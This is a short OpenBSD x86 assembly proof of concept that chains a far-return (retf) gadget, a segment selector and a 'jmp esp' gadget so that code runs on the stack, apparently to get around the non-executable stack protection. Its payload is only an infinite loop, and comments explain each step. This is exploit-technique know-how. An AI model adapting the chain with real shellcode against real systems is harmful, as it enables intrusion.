; OpenBSD far ret example
; julien@cr0.org

section .note.openbsd.ident align=2
    dd 8,4,1
    db 'OpenBSD',0
    dd 0

section .data

section .text

fret:     db 0xCB          ; 0xCB = retf (far return): pops EIP, then CS
runstack: jmp esp          ; obviously we execute code on the stack

global _start
_start:
    ;jmp 0x23:next

    ; This is our payload
    push 0xFEEB            ; shellcode (this is jmp -2): bytes EB FE in memory
    push 0x17              ; our segment selector (popped into CS by the retf)
    push runstack          ; this is the classic return address
                           ; don't expect to have a jmp esp in real life though ;)
    push fret              ; finding a static offset with 0xCB in a standard ELF's .text
                           ; is very easy

    ; This is the standard ret after we control the stack:
    ; ret pops fret, the retf there pops runstack and 0x17, then jmp esp runs the payload
    ret